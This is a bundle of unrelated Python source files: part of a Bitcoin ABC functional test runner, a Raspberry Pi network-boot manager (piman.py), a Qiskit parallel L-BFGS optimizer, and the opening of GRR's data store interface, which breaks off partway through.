formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel. Default=4.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--junitouput', '-ju',
default=os.path.join(build_dir, 'junit_results.xml'), help="file that will store JUnit formatted test results.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print(
"No functional tests to run. Wallet, utils, and bitcoind must all be enabled")
print(
"Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if not test in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub("\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub("\.py$", "", t) +
".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Use and update timings from build_dir only if separate
# build directory is used. We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from scr_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings, build_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitouput,
tmpdir, args.jobs, args.coverage, passon_args, args.combinedlogslen, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitouput, tmpdir, num_jobs, enable_coverage=False, args=[], combined_logs_len=0, build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = [os.path.join("--srcdir={}".format(build_dir), "src")] + args
flags.append("--cachedir={}".format(cache_dir))
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output(
[os.path.join(tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except Exception as e:
print(e.output)
raise e
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitouput, runtime)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty as e:
if not on_ci():
print("Running jobs: {}".format(", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.setDaemon(True)
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.setDaemon(True)
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name, runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=lambda result: result.name.lower())
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test script from script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings, build_timings=None):
"""
Returns only test that will not run longer that cutoff.
Long running tests are returned first to favor running tests in parallel
Timings from build directory override those from src directory
"""
def get_test_time(test):
if build_timings is not None:
timing = next(
(x['time'] for x in build_timings.existing_timings if x['name'] == test), None)
if timing is not None:
return timing
# try source directory. Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "bitcoin_abc_tests",
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file) as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exists are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save test that have passed - timings for failed test might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w') as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
|
piman.py
|
import logging
import logging.config
import os
from zipfile import ZipFile
import io
import time
# create the logger before doing imports since everyone is going
# to use them
local_logfile = './logging.conf'
if os.path.isfile(local_logfile):
logging.config.fileConfig(local_logfile)
else:
zipfile = os.path.dirname(__file__)
with ZipFile(zipfile) as z:
fd = z.open("logging.conf", mode='r')
# convert to a string
confstr = fd.read().decode()
logging.config.fileConfig(io.StringIO(confstr))
#create logger using configuration
logger = logging.getLogger('pimanlogger')
from threading import Thread
from sys import argv
from config_ui import web_ui
from dhcp import dhcp
from tcp import tcp
from tftp import tftp
from utility import power_cycle
from utility import mac_mapper
from piman import logger
from parse_config import config
import ntpserver
'''
piman.py
Attributes:
-----
data_dir : str
the directory of files needed for pis to boot
tftp_port : int
tftp use udp port 69 to establish network connection
tcp_port : int
tcp port number for tcp to establish network connection
ip : str
network ip address of pis and ip address of the router
subnet_mask : str
subnet mask for the ip address of pis
switch_address : str
ip address of the switch that connect pis
mac_ip_file : str
address of the file that save the mac address of pis and its ip address
Methods
-----
server()
Start tftp, dhcp, tcp connection between server and pis
restart(switch_address, port)
to restart the specific pi
reinstall(switch_address, port)
to reinstall a specific pi
exit_piman()
to exit piman
'''
data_dir = "./install/boot"
tftp_port = 69
tcp_port = 3333
ip = config['server_address']
subnet_mask = config['subnet_mask']
mac_ip_file = "hosts.csv"
lease_time = 600
interface = config['interface']
def server():
config_ui_thread = Thread(target=config_ui, args=[
"", "./piman.yaml", "./hosts.csv"], name="config_ui")
config_ui_thread.start()
tftp_thread = Thread(target=tftp.do_tftpd, args=[
data_dir, ip, tftp_port], name="tftpd")
tftp_thread.start()
dhcp_thread = Thread(target=dhcp.do_dhcp, args=[
mac_ip_file, subnet_mask, ip, lease_time, interface], name="dhcpd")
dhcp_thread.start()
tcp_thread = Thread(target=tcp.do_tcp, args=[
data_dir, tcp_port, ip], name="tcp")
tcp_thread.start()
ntp_thread = Thread(target=ntpserver.do_ntp())
ntp_thread.start()
config_ui_thread.join()
tftp_thread.join()
dhcp_thread.join()
tcp_thread.join()
ntp_thread.join()
def restart(switch_address, interface, ports):
for port in ports:
power_cycle.power_cycle(switch_address, interface, port)
def reinstall(switch_address, interface, port):
with open("reinstall.txt", "w") as f:
network_addr = ip[:7] + str(interface) + "." + str(port)
f.write(network_addr)
power_cycle.power_cycle(switch_address, interface, port)
def mapper(switch_address,interface, port):
for portNum in port:
power_cycle.power_cycle(switch_address,interface, portNum)
time.sleep(30)
mac_mapper.mac_mapper()
def config_ui(name, config_path, hosts_csv_path):
web_ui.start(name, config_path, hosts_csv_path)
def exit_piman():
logger.error("Insufficient amount of arguments")
exit(1)
if __name__ == "__main__":
args = "Arguments: "
for a in argv:
args += a + " "
logger.info(args)
if len(argv) < 2:
exit_piman()
if argv[1] == "server":
server()
elif argv[1] == "restart":
if len(argv) < 5:
exit_piman()
restart(argv[2], argv[3],argv[4])
elif argv[1] == "mapper":
if len(argv) < 5:
exit_piman()
mapper(argv[2],argv[3],argv[4])
elif argv[1] == "reinstall":
if len(argv) < 5:
exit_piman()
reinstall(argv[2], argv[3], argv[4])
elif argv[1] == "config":
config_ui(argv[2], argv[3], argv[4])
|
p_bfgs.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 IBM.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import multiprocessing
import platform
import logging
import numpy as np
from scipy import optimize as sciopt
from qiskit.aqua.components.optimizers import Optimizer
logger = logging.getLogger(__name__)
class P_BFGS(Optimizer):
"""Limited-memory BFGS algorithm. Parallel instantiations.
Uses scipy.optimize.fmin_l_bfgs_b
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
CONFIGURATION = {
'name': 'P_BFGS',
'description': 'Parallelized l_bfgs_b Optimizer',
'input_schema': {
'$schema': 'http://json-schema.org/schema#',
'id': 'p_bfgs_b_schema',
'type': 'object',
'properties': {
'maxfun': {
'type': 'integer',
'default': 1000
},
'factr': {
'type': 'integer',
'default': 10
},
'iprint': {
'type': 'integer',
'default': -1
},
'max_processes': {
'type': ['integer', 'null'],
'minimum': 1,
'default': None
}
},
'additionalProperties': False
},
'support_level': {
'gradient': Optimizer.SupportLevel.supported,
'bounds': Optimizer.SupportLevel.supported,
'initial_point': Optimizer.SupportLevel.required
},
'options': ['maxfun', 'factr', 'iprint'],
'optimizer': ['local', 'parallel']
}
def __init__(self, maxfun=1000, factr=10, iprint=-1, max_processes=None):
"""
Constructor.
For details, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
Args:
maxfun (int): Maximum number of function evaluations.
factr (float): The iteration stops when (f^k - f^{k+1})/max{|f^k|,
|f^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint (int): Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and |proj g| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes (int): maximum number of processes allowed.
"""
self.validate(locals())
super().__init__()
for k, v in locals().items():
if k in self._configuration['options']:
self._options[k] = v
self._max_processes = max_processes
def optimize(self, num_vars, objective_function, gradient_function=None, variable_bounds=None, initial_point=None):
num_procs = multiprocessing.cpu_count() - 1
num_procs = num_procs if self._max_processes is None else min(num_procs, self._max_processes)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == "Windows":
num_procs = 0
logger.warning("Using only current process. Multiple core use not supported in Windows")
queue = multiprocessing.Queue()
threshold = 2*np.pi # bounds for additional initial points in case bounds has any None values
low = [(l if l is not None else -threshold) for (l, u) in variable_bounds]
high = [(u if u is not None else threshold) for (l, u) in variable_bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(num_vars, objective_function, gradient_function, variable_bounds, _i_pt)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for i in range(num_procs):
i_pt = np.random.uniform(low, high) # Another random point in bounds
p = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(p)
p.start()
# While the one _optimize in this process below runs the other processes will be running to. This one runs
# with the supplied initial point. The process ones have their own random one
sol, opt, nfev = self._optimize(num_vars, objective_function, gradient_function, variable_bounds, initial_point)
for p in processes:
# For each other process we wait now for it to finish and see if it has a better result than above
p.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
return sol, opt, nfev
def _optimize(self, num_vars, objective_function, gradient_function=None, variable_bounds=None, initial_point=None):
super().optimize(num_vars, objective_function, gradient_function, variable_bounds, initial_point)
approx_grad = True if gradient_function is None else False
sol, opt, info = sciopt.fmin_l_bfgs_b(objective_function, initial_point, bounds=variable_bounds,
fprime=gradient_function, approx_grad=approx_grad, **self._options)
return sol, opt, info['funcalls']
|
data_store.py
|
#!/usr/bin/env python
"""The main data store abstraction.
The data store is responsible for storing AFF4 objects permanently. This file
defines the basic interface of the data store, but there is no specific
implementation. Concrete implementations should extend the DataStore class and
provide non-abstract methods.
The data store is essentially an object store. Objects have a subject (a unique
identifying name) and a series of arbitrary attributes. Attributes also have a
name and can only store a number of well defined types.
Some data stores have internal capability to filter and search for objects based
on attribute conditions. Due to the variability of this capability in
implementations, the Filter() class is defined inside the DataStore class
itself. This allows callers to create a data store specific filter
implementation, with no prior knowledge of the concrete implementation.
In order to accommodate for the data store's basic filtering capabilities it is
important to allow the data store to store attribute values using the most
appropriate types.
The currently supported data store storage types are:
- Integer
- Bytes
- String (unicode object).
This means that if one stores an attribute containing an integer, and then
retrieves this attribute, the data store guarantees that an integer is
returned (although it may be stored internally as something else).
More complex types should be encoded into bytes and stored in the data store as
bytes. The data store can then treat the type as an opaque type (and will not be
able to filter it directly).
"""
import abc
import atexit
import sys
import time
import logging
from grr.lib import access_control
from grr.lib import blob_store
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import stats
from grr.lib import utils
flags.DEFINE_bool("list_storage", False, "List all storage subsystems present.")
# A global data store handle
DB = None
# There are stub methods that don't return/yield as indicated by the docstring.
# pylint: disable=g-doc-return-or-yield
class Error(stats.CountingExceptionMixin, Exception):
"""Base class for all exceptions in this module."""
pass
class TimeoutError(Exception):
"""Raised when an access times out."""
pass
class DBSubjectLockError(Error):
"""Raised when a lock fails to commit."""
counter = "grr_commit_failure"
# This token will be used by default if no token was provided.
default_token = None
def GetDefaultToken(token):
"""Returns the provided token or the default token.
Args:
token: A token or None.
Raises:
access_control.UnauthorizedAccess, if no token was provided.
"""
if token is None:
token = default_token
if not isinstance(token, access_control.ACLToken):
raise access_control.UnauthorizedAccess(
"Token is not properly specified. It should be an "
"instance of grr.lib.access_control.ACLToken()")
return token
class MutationPool(object):
"""A mutation pool.
This is a pool to group a number of mutations together and apply
them at the same time. Note that there are no guarantees about the
atomicity of the mutations. Currently, no mutation will be applied
before Flush() is called on the pool. If datastore errors occur
during application, some mutations might be applied while others are
not.
"""
def __init__(self, token=None):
self.token = token
self.delete_subject_requests = []
self.set_requests = []
self.delete_attributes_requests = []
def DeleteSubjects(self, subjects):
self.delete_subject_requests.extend(subjects)
def DeleteSubject(self, subject):
self.delete_subject_requests.append(subject)
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
to_delete=None):
self.set_requests.append((subject, values, timestamp, replace, to_delete))
def Set(self, subject, attribute, value, timestamp=None, replace=True):
self.MultiSet(
subject, {attribute: [value]}, timestamp=timestamp, replace=replace)
def DeleteAttributes(self, subject, attributes, start=None, end=None):
self.delete_attributes_requests.append((subject, attributes, start, end))
def Flush(self):
"""Flushing actually applies all the operations in the pool."""
DB.DeleteSubjects(
self.delete_subject_requests, token=self.token, sync=False)
for req in self.delete_attributes_requests:
subject, attributes, start, end = req
DB.DeleteAttributes(
subject,
attributes,
start=start,
end=end,
token=self.token,
sync=False)
for req in self.set_requests:
subject, values, timestamp, replace, to_delete = req
DB.MultiSet(
subject,
values,
timestamp=timestamp,
replace=replace,
to_delete=to_delete,
token=self.token,
sync=False)
if (self.delete_subject_requests or self.delete_attributes_requests or
self.set_requests):
DB.Flush()
self.delete_subject_requests = []
self.set_requests = []
self.delete_attributes_requests = []
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Flush()
def Size(self):
return (len(self.delete_subject_requests) + len(self.set_requests) +
len(self.delete_attributes_requests))
class DataStore(object):
"""Abstract database access."""
__metaclass__ = registry.MetaclassRegistry
# Constants relating to timestamps.
ALL_TIMESTAMPS = "ALL_TIMESTAMPS"
NEWEST_TIMESTAMP = "NEWEST_TIMESTAMP"
TIMESTAMPS = [ALL_TIMESTAMPS, NEWEST_TIMESTAMP]
LEASE_ATTRIBUTE = "aff4:lease"
mutation_pool_cls = MutationPool
flusher_thread = None
monitor_thread = None
def __init__(self):
security_manager = access_control.AccessControlManager.GetPlugin(
config_lib.CONFIG["Datastore.security_manager"])()
self.security_manager = security_manager
logging.info("Using security manager %s", security_manager)
# Start the flusher thread.
self.flusher_thread = utils.InterruptableThread(
name="DataStore flusher thread", target=self.Flush, sleep_time=0.5)
self.flusher_thread.start()
self.monitor_thread = None
def GetRequiredResolveAccess(self, attribute_prefix):
"""Returns required level of access for resolve operations.
Args:
attribute_prefix: A string (single attribute) or a list of
strings (multiple attributes).
Returns:
"r" when only read access is needed for resolve operation to succeed.
Read operation allows reading the object when its URN is known.
"rq" when both read and query access is needed for resolve operation to
succeed. Query access allows reading indices, and thus traversing
trees of objects (see AFF4Volume.ListChildren for details).
"""
if isinstance(attribute_prefix, basestring):
attribute_prefix = [utils.SmartStr(attribute_prefix)]
else:
attribute_prefix = [utils.SmartStr(x) for x in attribute_prefix]
for prefix in attribute_prefix:
if not prefix:
return "rq"
# Extract the column family
try:
column_family, _ = prefix.split(":", 1)
except ValueError:
raise RuntimeError("The attribute prefix must contain the column "
"family: %s" % prefix)
# Columns with index require the query permission.
if column_family.startswith("index"):
return "rq"
return "r"
def InitializeBlobstore(self):
blobstore_name = config_lib.CONFIG.Get("Blobstore.implementation")
try:
cls = blob_store.Blobstore.GetPlugin(blobstore_name)
except KeyError:
raise RuntimeError("No blob store %s found." % blobstore_name)
self.blobstore = cls()
def InitializeMonitorThread(self):
"""Start the thread that registers the size of the DataStore."""
if self.monitor_thread:
return
self.monitor_thread = utils.InterruptableThread(
name="DataStore monitoring thread",
target=self._RegisterSize,
sleep_time=60)
self.monitor_thread.start()
def _RegisterSize(self):
"""Measures size of DataStore."""
stats.STATS.SetGaugeValue("datastore_size", self.Size())
def Initialize(self):
"""Initialization of the datastore."""
self.InitializeBlobstore()
@abc.abstractmethod
def DeleteSubject(self, subject, sync=False, token=None):
"""Completely deletes all information about this subject."""
def DeleteSubjects(self, subjects, sync=False, token=None):
"""Delete multiple subjects at once."""
for subject in subjects:
self.DeleteSubject(subject, sync=sync, token=token)
def Set(self,
subject,
attribute,
value,
timestamp=None,
token=None,
replace=True,
sync=True):
"""Set a single value for this subject's attribute.
Args:
subject: The subject this applies to.
attribute: Attribute name.
value: serialized value into one of the supported types.
timestamp: The timestamp for this entry in microseconds since the
epoch. If None means now.
token: An ACL token.
replace: Bool whether or not to overwrite current records.
sync: If true we ensure the new values are committed before returning.
"""
# TODO(user): don't allow subject = None
self.MultiSet(
subject, {attribute: [value]},
timestamp=timestamp,
token=token,
replace=replace,
sync=sync)
def LockRetryWrapper(self,
subject,
retrywrap_timeout=1,
token=None,
retrywrap_max_timeout=10,
blocking=True,
lease_time=None):
"""Retry a DBSubjectLock until it succeeds.
Args:
subject: The subject which the lock applies to.
retrywrap_timeout: How long to wait before retrying the lock.
